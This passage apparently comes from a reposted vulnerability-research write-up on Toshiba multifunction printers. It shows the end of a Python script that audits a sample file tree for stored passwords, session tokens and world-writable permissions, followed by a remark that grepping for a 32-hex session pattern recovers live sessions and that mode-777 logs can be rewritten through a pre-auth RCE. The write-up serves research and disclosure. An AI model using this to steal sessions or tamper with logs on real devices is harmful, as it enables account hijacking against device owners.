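            mode = os.stat(path).st_mode
            passwords, sessions = scan_file(path)
            if passwords or sessions or mode & stat.S_IWOTH:
                findings[os.path.relpath(path, root)] = {
                    "world_readable": bool(mode & stat.S_IROTH),
                    "world_writable": bool(mode & stat.S_IWOTH),
                    "passwords": passwords,
                    "sessions": sessions,
                }
    return findings


def run_demo():
    """Build the constructed tree, audit it and return the findings dict."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit(root)


if __name__ == "__main__":
    for rel, info in sorted(run_demo().items()):
        print(rel, info)
```

Grepping for the 32-hex session pattern is enough to recover a live session, but the world_writable flag is the one to watch for integrity: on the device, boserverEvent.log.28.txt and renderer.log.0/1.txt are mode 777, so a local user (or the apache account reached through the pre-auth RCE) can rewrite the login history as well as read it.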



Originally published on the WeChat public account Ots安全: 东芝多功能打印机 40 个漏洞挖掘过程(第一部分)

Copyright notice: posted by admin on July 31, 2024 at 10:27 AM.
Reprints must credit: 东芝多功能打印机 40 个漏洞挖掘过程(第一部分) | CTF导航
